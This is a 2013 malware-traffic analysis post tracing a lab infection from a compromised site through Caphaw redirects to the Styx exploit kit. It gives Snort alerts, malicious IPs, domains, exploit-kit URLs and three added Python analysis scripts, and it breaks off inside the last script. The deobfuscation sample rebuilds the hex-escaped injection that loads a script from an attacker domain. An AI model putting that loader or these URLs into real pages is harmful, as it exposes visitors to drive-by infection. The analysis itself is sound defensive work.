2013-11-23 - CAPHAW DRIVEBY LEADS TO STYX EK
PCAP AND MALWARE:
- ZIP of the PCAP: 2013-11-23-Styx-EK-traffic.pcap.zip
- ZIP file of the malware: 2013-11-23-Styx-EK-malware.zip
NOTES:
Had some time this past Friday to infect a vulnerable Windows VM and study the infection chain. I found a site named www.perfumelover.co.uk, which redirected to a Styx exploit kit. Clean MX Virus Watch shows URLs from this site flagged as Troj/JSRedir-HP as early as 2013-08-28, while Scumware.org has URLs from this site as early as 2013-10-14.
McAfee Labs has a blog article on the Styx exploit kit, which you can read here. The infection traffic looks similar to the image below, which I've modified slightly from that McAfee article:
Let's examine the infection traffic in more detail...
SNORT EVENTS
I used Security Onion to monitor a vulnerable Windows VM running Java 6 update 25. The infection traffic generated the following events in Sguil (all times GMT):
Screenshot of Sguil events for this infection.
- ET CURRENT_EVENTS W32/Caphaw DriveBy Campaign Statistic.js
- ET CURRENT_EVENTS W32/Caphaw DriveBy Campaign Ping.html
- ET CURRENT_EVENTS /Styx EK - /jorg.html
- ET CURRENT_EVENTS Styx EK - /jvvn.html
- ET CURRENT_EVENTS Unknown_gmf/Styx EK - fnts.html
- ET CURRENT_EVENTS Styx EK jply.html
- ET CURRENT_EVENTS Possible Java Applet JNLP applet_ssv_validated in Base64 2
- ET CURRENT_EVENTS Possible JavaFX Click To Run Bypass 2
- ET CURRENT_EVENTS DRIVEBY Blackhole - Landing Page Recieved - applet and flowbit
- ET CURRENT_EVENTS Styx Exploit Kit Landing Applet With Payload
- ET INFO EXE - Served Attached HTTP
- ET CURRENT_EVENTS Blackhole Exploit Kit Delivering Executable to Client
- ET TROJAN Suspicious Self Signed SSL Certificate to (MyCompany Ltd) likely Shylock CnC
INFECTION CHAIN OF EVENTS
ASSOCIATED DOMAINS
- 63.141.137.25 - www.perfumelover.co.uk - compromised website that channeled traffic to the exploit page
- 85.25.13.66 - pkktmkmnqxhgqbqmohlrv.peguards.cc - first in a series of redirects from the compromised website
- 85.25.13.66 - pkktmkmnqxhgqbqmohlrv.klr.su - second in a series of redirects from the compromised website
- 85.25.13.66 - sysinfo.su - third in a series of redirects from the compromised website
- 185.31.209.83 - diq.endpointcash.asia - domain hosting the Styx exploit kit, which delivered the exploits and the malicious executable
INITIAL INFECTION CHAIN
- 23:55:11 - 192.168.204.134 port 50139 - 63.141.137.25 port 80 ( www.perfumelover.co.uk ) - GET /cartier-eau-de-cartier-essence-dorange-edt-100ml/
- 23:55:13 - 192.168.204.134 port 50167 - 85.25.13.66 port 80 ( pkktmkmnqxhgqbqmohlrv.peguards.cc ) - GET /9cfb37b8iq/get.js
- 23:55:15 - 192.168.204.134 port 50168 - 85.25.13.66 port 80 ( pkktmkmnqxhgqbqmohlrv.klr.su ) - GET /statistic.js?k=9cfb37b8iq&d=peguards.cc
- 23:55:18 - 192.168.204.134 port 50171 - 85.25.13.66 port 80 ( sysinfo.su ) - GET /ping.html?id=9cfb37b8iq&js=1&key=default
- 23:55:21 - 192.168.204.134 port 50195 - 185.31.209.83 port 80 ( diq.endpointcash.asia ) - GET /pu9C7E0Mw/[long string]/09PT0/
- 23:55:21 - 192.168.204.134 port 50195 - 185.31.209.83 port 80 ( diq.endpointcash.asia ) - GET /7eaPO-U07g-EB0-Nsg40/[long string]/TN/
- 23:55:21 - 192.168.204.134 port 50195 - 185.31.209.83 port 80 ( diq.endpointcash.asia ) - GET /7eaPO-U07g-EB0-Nsg40/[long string]/TN/jorg.html
- 23:55:22 - 192.168.204.134 port 50203 - 185.31.209.83 port 80 ( diq.endpointcash.asia ) - GET /7eaPO-U07g-EB0-Nsg40/[long string]/TN/jvvn.html
- 23:55:22 - 192.168.204.134 port 50205 - 185.31.209.83 port 80 ( diq.endpointcash.asia ) - GET /7eaPO-U07g-EB0-Nsg40/[long string]/TN/pliexp.html
- 23:55:22 - 192.168.204.134 port 50204 - 185.31.209.83 port 80 ( diq.endpointcash.asia ) - GET /7eaPO-U07g-EB0-Nsg40/[long string]/TN/fnts.html
- 23:55:22 - 192.168.204.134 port 50195 - 185.31.209.83 port 80 ( diq.endpointcash.asia ) - GET /7eaPO-U07g-EB0-Nsg40/[long string]/TN/jply.html
- 23:55:23 - 192.168.204.134 port 50204 - 185.31.209.83 port 80 ( diq.endpointcash.asia ) - GET /7eaPO-U07g-EB0-Nsg40/[long string]/TN/bhtntqlj.html
- 23:55:23 - 192.168.204.134 port 50195 - 185.31.209.83 port 80 ( diq.endpointcash.asia ) - GET /7eaPO-U07g-EB0-Nsg40/[long string]/TN/UPURxASzc.eot [CVE-2011-3402 Exploit]
- 23:55:24 - 192.168.204.134 port 50203 - 185.31.209.83 port 80 ( diq.endpointcash.asia ) - GET /7eaPO-U07g-EB0-Nsg40/[long string]/TN/iexp.html
- 23:55:25 - 192.168.204.134 port 50205 - 185.31.209.83 port 80 ( diq.endpointcash.asia ) - GET /7eaPO-U07g-EB0-Nsg40/[long string]/TN/ixlc.html
- 23:55:36 - 192.168.204.134 port 50195 - 185.31.209.83 port 80 ( diq.endpointcash.asia ) - GET /l26tm20/[long string]/l7xD5zhET9.exe?7F7x=5fa77&h=33 [Malicious executable]
NOTE: More traffic follows where Java exploits are sent from diq.endpointcash.asia, and the same malicious executable is delivered again. I've omitted those additional events in the above list, so we can focus on the first successful exploit.
POST INFECTION CALLBACK TRAFFIC
- 23:55:40 - 192.168.204.134 port 50213 - 69.163.43.175 port 443 - xr7zd1hr5cqn.kre.cc
- 23:55:43 - 192.168.204.134 port 50218 - 198.52.243.229 port 443 - 4wn6f3o.kre.cc
- 23:55:43 - 192.168.204.134 port 50220 - 198.52.243.229 port 443 - 59cptvob3.kre.cc
- 23:55:43 - 192.168.204.134 port 50219 - 181.41.193.168 port 443 - 21cqk542pejhmzqy.kre.cc
- 23:55:43 - 192.168.204.134 port 50221 - 198.52.243.229 port 443 - 4wn6f3o.kre.cc
- 23:55:43 - 192.168.204.134 port 50222 - 198.52.243.229 port 443 - 59cptvob3.kre.cc
- 23:55:43 - 192.168.204.134 port 50223 - 69.163.43.175 port 443 - cutjmnj0b.www5.kre.cc
- 23:55:43 - 192.168.204.134 port 50224 - 181.41.193.168 port 443 - xr7ygt7mk4enngh0.www5.kre.cc
- 23:55:44 - 192.168.204.134 port 50227 - 69.163.43.175 port 443 - cutjmnj0b.www5.kre.cc
- 23:55:44 - 192.168.204.134 port 50229 - 198.52.243.229 port 443 - uwablphuluq.kre.cc
- 23:55:44 - 192.168.204.134 port 50228 - 181.41.193.168 port 443 - 21cqk542pejhmzqy.kre.cc
- 23:55:44 - 192.168.204.134 port 50231 - 198.52.243.229 port 443 - uwablphuluq.kre.cc
- 23:55:44 - 192.168.204.134 port 50230 - 181.41.202.249 port 443 - 84c3gl.www5.kre.cc
- 23:55:44 - 192.168.204.134 port 50232 - 181.41.193.168 port 443 - xr7ygt7mk4enngh0.www5.kre.cc
- 23:55:44 - 192.168.204.134 port 50235 - 181.41.202.249 port 443 - 84c3gl.www5.kre.cc
- 23:55:45 - 192.168.204.134 port 50237 - 181.41.202.249 port 443 - jzgixx97hffu7c8k.kre.cc
- 23:55:45 - 192.168.204.134 port 50240 - 69.163.43.175 port 443 - 3fnd5y95x6nmmp7.kre.cc
- 23:55:45 - 192.168.204.134 port 50239 - 181.41.202.249 port 443 - jzgixx97hffu7c8k.kre.cc
- 23:55:46 - 192.168.204.134 port 50225 - 109.123.127.228 port 443 - xweie2.kre.cc
- 23:56:09 - 192.168.204.134 port 50273 - 181.41.202.249 port 443 - 81x8fi5p.www5.kre.cc
- 23:56:13 - 192.168.204.134 port 50289 - 109.123.127.228 port 443 - 1aw2nml.kre.cc
NOTE: In addition to kre.cc, other suffixes in the SSL callback traffic include bai.su, pfh.cc, rwn.cc, sgu.cc, and sxo.su.
INFECTION TRAFFIC DETAILS
IP address: 63.141.137.25 port 80
domain name: www.perfumelover.co.uk
HTTP request: GET /cartier-eau-de-cartier-essence-dorange-edt-100ml/
Sguil events: None
Screenshot of traffic:
In the HTML of the web page, we see javascript that leads to the next step in the infection chain:
The underlined portion is a hex-escaped JavaScript string that decodes to http://"+s1+".peguards.cc/9cfb37b8iq/get.js
where s1 is a variable holding the randomized subdomain prefix (pkktmkmnqxhgqbqmohlrv in this capture).
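To recover a URL like that without running the page's script, decode the \xNN escapes and then fold the string concatenation around the variable. The script below is an added example (my code, not the injected script from www.perfumelover.co.uk). SAMPLE_JS is a constructed stand-in that mirrors the pattern described above; the variable names s1/s2 and the createElement call in it are assumptions, and only the decoded URL is from this capture.

```python
import re

# Constructed sample modelled on the hex-escaped injection described above.
# It is NOT the real script from the compromised site; only the decoded
# URL (http://<prefix>.peguards.cc/9cfb37b8iq/get.js) is from the capture.
SAMPLE_JS = r"""
var s1="pkktmkmnqxhgqbqmohlrv";
var s2="\x68\x74\x74\x70\x3a\x2f\x2f"+s1+"\x2e\x70\x65\x67\x75\x61\x72\x64\x73\x2e\x63\x63\x2f\x39\x63\x66\x62\x33\x37\x62\x38\x69\x71\x2f\x67\x65\x74\x2e\x6a\x73";
var e=document.createElement("\x73\x63\x72\x69\x70\x74");
e.src=s2;
"""

ESCAPE = re.compile(r'\\x([0-9a-fA-F]{2})|\\u([0-9a-fA-F]{4})')
# `name = expr;` or `var name = expr;` where name may be dotted (e.src)
ASSIGN = re.compile(r'(?:var\s+)?([A-Za-z_$][\w$]*(?:\.\w+)*)\s*=\s*([^;]+);')
LITERAL = re.compile(r'^(["\'])(.*)\1$', re.S)


def decode_js_escapes(body):
    """Replace \\xNN and \\uNNNN escapes in the body of a JS string literal."""
    return ESCAPE.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), body)


def resolve_concat(expr, env):
    """Evaluate `"lit" + name + "lit"` against known variables; unknown names
    are left as {name} so you can see what is still unresolved. Splitting on
    '+' is safe for hex-escaped literals (a literal plus would be \\x2b)."""
    out = []
    for piece in expr.split('+'):
        piece = piece.strip()
        m = LITERAL.match(piece)
        out.append(decode_js_escapes(m.group(2)) if m else env.get(piece, '{%s}' % piece))
    return ''.join(out)


def evaluate_assignments(js):
    """Walk the assignments in source order, resolving each one against the
    values assigned before it, and return {name: decoded value}."""
    env = {}
    for name, expr in ASSIGN.findall(js):
        env[name] = resolve_concat(expr, env)
    return env


def find_urls(js):
    """Every distinct assigned value that decodes to an http(s) URL."""
    urls = []
    for value in evaluate_assignments(js).values():
        if value.startswith(('http://', 'https://')) and value not in urls:
            urls.append(value)
    return urls


if __name__ == '__main__':
    for url in find_urls(SAMPLE_JS):
        print(url)
```

The resolver only understands string literals and plain variable references; function calls and array lookups come out as {unresolved} placeholders, which is usually the point where this kind of obfuscation gets handed to a real JavaScript engine instead.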
IP address: 85.25.13.66 port 80
domain name: pkktmkmnqxhgqbqmohlrv.peguards.cc
HTTP request: GET /9cfb37b8iq/get.js
Sguil events: None
Screenshot of traffic:
This script is also hex-escaped; decoded, it references the next link in the infection chain (statistic.js on pkktmkmnqxhgqbqmohlrv.klr.su).
IP address: 85.25.13.66 port 80
domain name: pkktmkmnqxhgqbqmohlrv.klr.su
HTTP request: GET /statistic.js?k=9cfb37b8iq&d=peguards.cc
Sguil event: ET CURRENT_EVENTS W32/Caphaw DriveBy Campaign Statistic.js
Screenshot of traffic:
IP address: 85.25.13.66 port 80
domain name: sysinfo.su
HTTP request: GET /ping.html?id=9cfb37b8iq&js=1&key=default
Sguil event: ET CURRENT_EVENTS W32/Caphaw DriveBy Campaign Ping.html
Screenshot of traffic:
IP address: 185.31.209.83 port 80
domain name: diq.endpointcash.asia
HTTP requests (the first returned a "302 Found" that redirected to the second):
- GET /pu9C7E0Mw/h70J0a717s_WC14YC_R0bXe21/3ytY0q-BxO0kWj_t0XUD/606q8z0-EEmr0RJ-7o/09PT0/
- GET /7eaPO-U07g-EB0-Nsg40/DLmI0k-5JW0zKS_M02-7JV0xBuX_02FB_M08jy_A0zfm-c0B08O0mYp/U04_7Zf0tnqM-0dbzs_0IOYO0/PIQk1_575V0-n33/A0d8o40Y_n8Y0vzYy/161/9814kEX-0Zu/h90/yKo0-0geg/p0jAgs0F/jzr02y-Bx0KxQ40_eMPJ0L/hOL0Q4h-g0V_uRO0-2bk_M159qV_02EKL0qyGQ0/7cD-h0Gx_hu0qUbq/0P8n/q09GX-b0C6hb_000O80_wnKe0gGtr0_Vf8U0_9l2V0Ru/wW0vF3D/1205x0T/KsG0Tc8O1-0kZ3/0Kl5w0ZQ6-F0Kww/R11KRf0o_dD20FQ/TN/
Sguil events: None
Screenshot of traffic:
This is the first page of the Styx exploit kit.
IP address: 185.31.209.83 port 80
domain name: diq.endpointcash.asia
HTTP requests:
- GET /7eaPO-U07g-EB0-Nsg40/DLmI0k-5JW0zKS_M02-7JV0xBuX_02FB_M08jy_A0zfm-c0B08O0mYp/U04_7Zf0tnqM-0dbzs_0IOYO0/PIQk1_575V0-n33/A0d8o40Y_n8Y0vzYy/161/9814kEX-0Zu/h90/yKo0-0geg/p0jAgs0F/jzr02y-Bx0KxQ40_eMPJ0L/hOL0Q4h-g0V_uRO0-2bk_M159qV_02EKL0qyGQ0/7cD-h0Gx_hu0qUbq/0P8n/q09GX-b0C6hb_000O80_wnKe0gGtr0_Vf8U0_9l2V0Ru/wW0vF3D/1205x0T/KsG0Tc8O1-0kZ3/0Kl5w0ZQ6-F0Kww/R11KRf0o_dD20FQ/TN/jorg.html
- GET /7eaPO-U07g-EB0-Nsg40/DLmI0k-5JW0zKS_M02-7JV0xBuX_02FB_M08jy_A0zfm-c0B08O0mYp/U04_7Zf0tnqM-0dbzs_0IOYO0/PIQk1_575V0-n33/A0d8o40Y_n8Y0vzYy/161/9814kEX-0Zu/h90/yKo0-0geg/p0jAgs0F/jzr02y-Bx0KxQ40_eMPJ0L/hOL0Q4h-g0V_uRO0-2bk_M159qV_02EKL0qyGQ0/7cD-h0Gx_hu0qUbq/0P8n/q09GX-b0C6hb_000O80_wnKe0gGtr0_Vf8U0_9l2V0Ru/wW0vF3D/1205x0T/KsG0Tc8O1-0kZ3/0Kl5w0ZQ6-F0Kww/R11KRf0o_dD20FQ/TN/jvvn.html
- GET /7eaPO-U07g-EB0-Nsg40/DLmI0k-5JW0zKS_M02-7JV0xBuX_02FB_M08jy_A0zfm-c0B08O0mYp/U04_7Zf0tnqM-0dbzs_0IOYO0/PIQk1_575V0-n33/A0d8o40Y_n8Y0vzYy/161/9814kEX-0Zu/h90/yKo0-0geg/p0jAgs0F/jzr02y-Bx0KxQ40_eMPJ0L/hOL0Q4h-g0V_uRO0-2bk_M159qV_02EKL0qyGQ0/7cD-h0Gx_hu0qUbq/0P8n/q09GX-b0C6hb_000O80_wnKe0gGtr0_Vf8U0_9l2V0Ru/wW0vF3D/1205x0T/KsG0Tc8O1-0kZ3/0Kl5w0ZQ6-F0Kww/R11KRf0o_dD20FQ/TN/fnts.html
Sguil events:
- ET CURRENT_EVENTS /Styx EK - /jorg.html
- ET CURRENT_EVENTS Styx EK - /jvvn.html
- ET CURRENT_EVENTS Unknown_gmf/Styx EK - fnts.html
IP address: 185.31.209.83 port 80
domain name: diq.endpointcash.asia
HTTP request: GET /7eaPO-U07g-EB0-Nsg40/DLmI0k-5JW0zKS_M02-7JV0xBuX_02FB_M08jy_A0zfm-c0B08O0mYp/U04_7Zf0tnqM-0dbzs_0IOYO0/PIQk1_575V0-n33/A0d8o40Y_n8Y0vzYy/161/9814kEX-0Zu/h90/yKo0-0geg/p0jAgs0F/jzr02y-Bx0KxQ40_eMPJ0L/hOL0Q4h-g0V_uRO0-2bk_M159qV_02EKL0qyGQ0/7cD-h0Gx_hu0qUbq/0P8n/q09GX-b0C6hb_000O80_wnKe0gGtr0_Vf8U0_9l2V0Ru/wW0vF3D/1205x0T/KsG0Tc8O1-0kZ3/0Kl5w0ZQ6-F0Kww/R11KRf0o_dD20FQ/TN/jply.html
Sguil events:
- ET CURRENT_EVENTS Styx EK jply.html
- ET CURRENT_EVENTS Possible Java Applet JNLP applet_ssv_validated in Base64 2
- ET CURRENT_EVENTS Possible JavaFX Click To Run Bypass 2
- ET CURRENT_EVENTS DRIVEBY Blackhole - Landing Page Recieved - applet and flowbit
- ET CURRENT_EVENTS Styx Exploit Kit Landing Applet With Payload
Screenshot of traffic:
IP address: 185.31.209.83 port 80
domain name: diq.endpointcash.asia
HTTP requests:
- GET /7eaPO-U07g-EB0-Nsg40/DLmI0k-5JW0zKS_M02-7JV0xBuX_02FB_M08jy_A0zfm-c0B08O0mYp/U04_7Zf0tnqM-0dbzs_0IOYO0/PIQk1_575V0-n33/A0d8o40Y_n8Y0vzYy/161/9814kEX-0Zu/h90/yKo0-0geg/p0jAgs0F/jzr02y-Bx0KxQ40_eMPJ0L/hOL0Q4h-g0V_uRO0-2bk_M159qV_02EKL0qyGQ0/7cD-h0Gx_hu0qUbq/0P8n/q09GX-b0C6hb_000O80_wnKe0gGtr0_Vf8U0_9l2V0Ru/wW0vF3D/1205x0T/KsG0Tc8O1-0kZ3/0Kl5w0ZQ6-F0Kww/R11KRf0o_dD20FQ/TN/pliexp.html
- GET /7eaPO-U07g-EB0-Nsg40/DLmI0k-5JW0zKS_M02-7JV0xBuX_02FB_M08jy_A0zfm-c0B08O0mYp/U04_7Zf0tnqM-0dbzs_0IOYO0/PIQk1_575V0-n33/A0d8o40Y_n8Y0vzYy/161/9814kEX-0Zu/h90/yKo0-0geg/p0jAgs0F/jzr02y-Bx0KxQ40_eMPJ0L/hOL0Q4h-g0V_uRO0-2bk_M159qV_02EKL0qyGQ0/7cD-h0Gx_hu0qUbq/0P8n/q09GX-b0C6hb_000O80_wnKe0gGtr0_Vf8U0_9l2V0Ru/wW0vF3D/1205x0T/KsG0Tc8O1-0kZ3/0Kl5w0ZQ6-F0Kww/R11KRf0o_dD20FQ/TN/bhtntqlj.html
- GET /7eaPO-U07g-EB0-Nsg40/DLmI0k-5JW0zKS_M02-7JV0xBuX_02FB_M08jy_A0zfm-c0B08O0mYp/U04_7Zf0tnqM-0dbzs_0IOYO0/PIQk1_575V0-n33/A0d8o40Y_n8Y0vzYy/161/9814kEX-0Zu/h90/yKo0-0geg/p0jAgs0F/jzr02y-Bx0KxQ40_eMPJ0L/hOL0Q4h-g0V_uRO0-2bk_M159qV_02EKL0qyGQ0/7cD-h0Gx_hu0qUbq/0P8n/q09GX-b0C6hb_000O80_wnKe0gGtr0_Vf8U0_9l2V0Ru/wW0vF3D/1205x0T/KsG0Tc8O1-0kZ3/0Kl5w0ZQ6-F0Kww/R11KRf0o_dD20FQ/TN/iexp.html
- GET /7eaPO-U07g-EB0-Nsg40/DLmI0k-5JW0zKS_M02-7JV0xBuX_02FB_M08jy_A0zfm-c0B08O0mYp/U04_7Zf0tnqM-0dbzs_0IOYO0/PIQk1_575V0-n33/A0d8o40Y_n8Y0vzYy/161/9814kEX-0Zu/h90/yKo0-0geg/p0jAgs0F/jzr02y-Bx0KxQ40_eMPJ0L/hOL0Q4h-g0V_uRO0-2bk_M159qV_02EKL0qyGQ0/7cD-h0Gx_hu0qUbq/0P8n/q09GX-b0C6hb_000O80_wnKe0gGtr0_Vf8U0_9l2V0Ru/wW0vF3D/1205x0T/KsG0Tc8O1-0kZ3/0Kl5w0ZQ6-F0Kww/R11KRf0o_dD20FQ/TN/ixlc.html
Sguil events: None
NOTE: These are some of the other HTML pages delivered by this version of the Styx exploit kit. No updated signatures existed for these on Security Onion as of 2013-11-23.
IP address: 185.31.209.83 port 80
domain name: diq.endpointcash.asia
HTTP request: GET /7eaPO-U07g-EB0-Nsg40/DLmI0k-5JW0zKS_M02-7JV0xBuX_02FB_M08jy_A0zfm-c0B08O0mYp/U04_7Zf0tnqM-0dbzs_0IOYO0/PIQk1_575V0-n33/A0d8o40Y_n8Y0vzYy/161/9814kEX-0Zu/h90/yKo0-0geg/p0jAgs0F/jzr02y-Bx0KxQ40_eMPJ0L/hOL0Q4h-g0V_uRO0-2bk_M159qV_02EKL0qyGQ0/7cD-h0Gx_hu0qUbq/0P8n/q09GX-b0C6hb_000O80_wnKe0gGtr0_Vf8U0_9l2V0Ru/wW0vF3D/1205x0T/KsG0Tc8O1-0kZ3/0Kl5w0ZQ6-F0Kww/R11KRf0o_dD20FQ/TN/UPURxASzc.eot
Sguil events: None
Screenshot of traffic:
This EOT file is an exploit that targets CVE-2011-3402, the TrueType font parsing vulnerability in win32k.sys that Microsoft patched in MS11-087.
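Pulling apart the EOT container is the first step in looking at a font exploit, because the TrueType data sits inside an EOT wrapper and may be XOR-obfuscated or compressed. The script below is an added example (my code, not from the original post and not derived from UPURxASzc.eot): it parses the EOT header layout from the W3C EOT submission, unwraps the embedded sfnt, lists its table directory, and reports what a first triage pass cares about: size fields that disagree with the file, table records pointing outside the font data, and the presence of the fpgm/prep/cvt/glyf tables that feed the TrueType bytecode interpreter. SAMPLE_FONT and SAMPLE_EOT are constructed inside the block; the findings are heuristics, not a CVE-2011-3402 detector.

```python
import struct

EOT_MAGIC = 0x504C
TTEMBED_TTCOMPRESSED = 0x00000004    # FontData is MTX-compressed
TTEMBED_XORENCRYPTDATA = 0x10000000  # FontData is XORed with 0x50
BYTECODE_TABLES = ('fpgm', 'prep', 'cvt ', 'glyf')  # what the TrueType interpreter consumes


def parse_eot(data):
    """Parse an EOT header (layout per the W3C EOT submission). Returns header
    fields, the name strings, a findings list and the embedded font bytes."""
    if len(data) < 82 or struct.unpack_from('<H', data, 34)[0] != EOT_MAGIC:
        raise ValueError('not an EOT file (short header or bad MagicNumber)')
    eot_size, font_size, version, flags = struct.unpack_from('<IIII', data, 0)
    info = {'EOTSize': eot_size, 'FontDataSize': font_size, 'Version': version,
            'Flags': flags, 'findings': []}
    if eot_size != len(data):
        info['findings'].append('EOTSize %d != file size %d' % (eot_size, len(data)))
    fields = ['FamilyName', 'StyleName', 'VersionName', 'FullName']
    if version >= 0x00020001:
        fields.append('RootString')
    off = 80                                   # Padding1 at 80, FamilyNameSize at 82
    for field in fields:                       # each: PaddingN, NameSize, Name (UTF-16LE)
        size = struct.unpack_from('<H', data, off + 2)[0]
        off += 4
        info[field] = data[off:off + size].decode('utf-16-le', 'replace')
        off += size
    if version >= 0x00020002:                  # RootStringCheckSum, EUDCCodePage, Padding6
        off += 10
        off += 2 + struct.unpack_from('<H', data, off)[0] + 4   # Signature, then EUDCFlags
        off += 4 + struct.unpack_from('<I', data, off)[0]       # EUDCFontData
    font = data[off:off + font_size]
    if len(font) != font_size:
        info['findings'].append('FontDataSize %d runs past the end of the file' % font_size)
    if flags & TTEMBED_XORENCRYPTDATA:
        font = bytes(b ^ 0x50 for b in font)
    info['font'] = font
    return info


def sfnt_tables(font):
    """Read the sfnt table directory. Returns {tag: (offset, length)} and the
    tags whose records point outside the font data."""
    num_tables = struct.unpack_from('>H', font, 4)[0]
    tables, out_of_bounds = {}, []
    for i in range(num_tables):
        rec = 12 + 16 * i
        if rec + 16 > len(font):
            out_of_bounds.append('<truncated directory>')
            break
        tag, _checksum, offset, length = struct.unpack_from('>4sIII', font, rec)
        tag = tag.decode('latin-1')
        tables[tag] = (offset, length)
        if offset + length > len(font):
            out_of_bounds.append(tag)
    return tables, out_of_bounds


def triage_eot(data):
    """Header consistency and table directory checks. Heuristic triage only;
    it does not decide whether the font actually triggers CVE-2011-3402."""
    info = parse_eot(data)
    if info['Flags'] & TTEMBED_TTCOMPRESSED:
        info['findings'].append('FontData is MTX-compressed; decompress before inspecting')
        return info
    if len(info['font']) < 12:
        info['findings'].append('FontData too short to hold an sfnt header')
        return info
    tables, bad = sfnt_tables(info['font'])
    info['tables'] = sorted(tables)
    for tag in bad:
        info['findings'].append('table %r points outside the font data' % tag)
    programs = [t for t in BYTECODE_TABLES if t in tables]
    if programs:
        info['findings'].append('carries TrueType bytecode tables %s' % programs)
    return info


# --- constructed sample; NOT the UPURxASzc.eot from the capture ----------------
def build_sfnt(tables):
    """Minimal sfnt container from {tag(bytes): payload}; checksums left zero."""
    header = struct.pack('>IHHHH', 0x00010000, len(tables), 0, 0, 0)
    directory, body, base = b'', b'', 12 + 16 * len(tables)
    for tag, blob in tables.items():
        directory += struct.pack('>4sIII', tag, 0, base + len(body), len(blob))
        body += blob + b'\0' * (-len(blob) % 4)            # 4-byte align like real fonts
    return header + directory + body


def build_eot(font, family='Demo', version=0x00020001, flags=0):
    """Wrap sfnt bytes in an EOT v2.1 header (four names plus RootString)."""
    tail = b''
    for name in (family, 'Regular', 'Version 1.0', family, ''):
        enc = name.encode('utf-16-le')
        tail += struct.pack('<HH', 0, len(enc)) + enc        # PaddingN, NameSize, Name
    fixed = struct.pack('<IIII10sBBIHH4I2II4I',
                        80 + len(tail) + len(font), len(font), version, flags,
                        b'\0' * 10, 1, 0, 400, 0, EOT_MAGIC, *([0] * 11))
    return fixed + tail + font


SAMPLE_FONT = build_sfnt({b'fpgm': b'\xb0\x00\x2c', b'prep': b'\xb1\x00\x00', b'glyf': b'\0' * 8})
SAMPLE_EOT = build_eot(SAMPLE_FONT)

if __name__ == '__main__':
    result = triage_eot(SAMPLE_EOT)
    print(result['FamilyName'], result['tables'], result['findings'])
```

Run as-is it prints the family name, table list and findings for the constructed sample; swap SAMPLE_EOT for the bytes of a .eot carved out of the PCAP to triage that instead. A font with TTEMBED_TTCOMPRESSED set needs an MTX decompressor first, which the block deliberately does not attempt.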
IP address: 185.31.209.83 port 80
domain name: diq.endpointcash.asia
HTTP request: GET /l26tm20/IwGE-0LFSD0_XU9-x0GPGO0CeUj/008_Nf0FyT5-07FXi13X_Hy17_moB018/CS0/LTQ_Z0MK2_Y07UJ6/0O4n_v0KS4Q0BnlP_00AH00Ps-0I0/LgvY0J/BFN07DeE-0lCzM/11aU/t0OduV_0e_s4M13r/960gdFk_0Tnf5_0Rg_7x0wx-Ys0WA/dY0RY6_f04/IRu0svJE-0fr8L0V1/MS0L_fXJ0/8SIT-0zi-xO0-Xkic0ke_7o0t6-930luSJ0m_2Nm05AUO-07KZI0/GLA-s0/oMaE0_8uDw111M-J0ghng-0k1V-q0zsst0-H05E00/CFp/0rPut0g_9U_50bE8d0/CTe-g0RXv-R04MFA0/qcf00F-vrK/l7xD5zhET9.exe?7F7x=5fa77&h=33
Sguil events:
- ET INFO EXE - Served Attached HTTP
- ET CURRENT_EVENTS Blackhole Exploit Kit Delivering Executable to Client
Screenshot of traffic:
IP address: various on port 443
domain name: various
Sguil event: ET TROJAN Suspicious Self Signed SSL Certificate to (MyCompany Ltd) likely Shylock CnC
Screenshot of traffic:
Filtered in Wireshark so you can see the domain names from the SSL handshakes.
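The names in that view come from the SNI field of each ClientHello, which is the only plaintext hostname you get on a TLS connection whose certificate is self-signed junk. The script below is an added example (my code, not from the original post): it extracts the SNI host_name from a raw TLS ClientHello record with every length bounds-checked, then groups the results by suffix so the randomized prefixes collapse onto the handful of registered domains the bot rotates through. The ClientHello builder and the www.example.com entry are constructed for the demo; the kre.cc hostnames are taken from the callback list above.

```python
import struct
from collections import defaultdict


def build_client_hello(hostname):
    """Minimal TLS 1.0 ClientHello record carrying a single SNI extension.
    Constructed for this demo; real clients send many more extensions."""
    name = hostname.encode('ascii')
    entry = struct.pack('>BH', 0, len(name)) + name                   # name_type host_name(0), length, name
    ext = struct.pack('>HHH', 0, len(entry) + 2, len(entry)) + entry  # ext type 0, ext length, list length
    body = (b'\x03\x01' + b'\x11' * 32                                 # client_version, random
            + b'\x00'                                                  # session_id length 0
            + struct.pack('>H', 2) + b'\x00\x2f'                       # one cipher suite
            + b'\x01\x00'                                              # one compression method (null)
            + struct.pack('>H', len(ext)) + ext)
    handshake = b'\x01' + len(body).to_bytes(3, 'big') + body          # HandshakeType client_hello
    return b'\x16\x03\x01' + struct.pack('>H', len(handshake)) + handshake


def client_hello_sni(record):
    """Return the SNI host_name from a TLS ClientHello record, or None.
    Every length is checked against the buffer, so a truncated or hostile
    record is rejected rather than read out of bounds."""
    if len(record) < 5 or record[0] != 0x16:
        return None
    hs = record[5:5 + struct.unpack_from('>H', record, 3)[0]]
    if len(hs) < 4 or hs[0] != 0x01:
        return None
    hs_len = int.from_bytes(hs[1:4], 'big')
    body = hs[4:4 + hs_len]
    if len(body) != hs_len:
        return None
    pos = 2 + 32                                                       # client_version + random
    if pos >= len(body):
        return None
    pos += 1 + body[pos]                                               # session_id
    if pos + 2 > len(body):
        return None
    pos += 2 + struct.unpack_from('>H', body, pos)[0]                  # cipher_suites
    if pos >= len(body):
        return None
    pos += 1 + body[pos]                                               # compression_methods
    if pos + 2 > len(body):
        return None
    end = min(pos + 2 + struct.unpack_from('>H', body, pos)[0], len(body))
    pos += 2
    while pos + 4 <= end:
        ext_type, length = struct.unpack_from('>HH', body, pos)
        data = body[pos + 4:pos + 4 + length]
        pos += 4 + length
        if ext_type == 0 and len(data) >= 5:                           # server_name extension
            name_type, name_len = struct.unpack_from('>BH', data, 2)   # skip the list length
            if name_type == 0 and 5 + name_len <= len(data):
                return data[5:5 + name_len].decode('ascii', 'replace')
    return None


def group_by_suffix(hostnames, labels=2):
    """Group hostnames by their last `labels` DNS labels so the randomized
    prefixes collapse onto the registered domains the bot rotates through."""
    groups = defaultdict(list)
    for host in hostnames:
        parts = host.lower().rstrip('.').split('.')
        groups['.'.join(parts[-labels:])].append(host)
    return dict(groups)


def callback_report(records):
    """SNI names from a batch of ClientHello records, grouped by suffix."""
    return group_by_suffix([n for n in map(client_hello_sni, records) if n])


# Hostnames from the callback list above, plus one constructed benign name.
SAMPLE_HOSTS = ['xr7zd1hr5cqn.kre.cc', '4wn6f3o.kre.cc', 'cutjmnj0b.www5.kre.cc',
                '21cqk542pejhmzqy.kre.cc', 'www.example.com']
SAMPLE_RECORDS = [build_client_hello(h) for h in SAMPLE_HOSTS]

if __name__ == '__main__':
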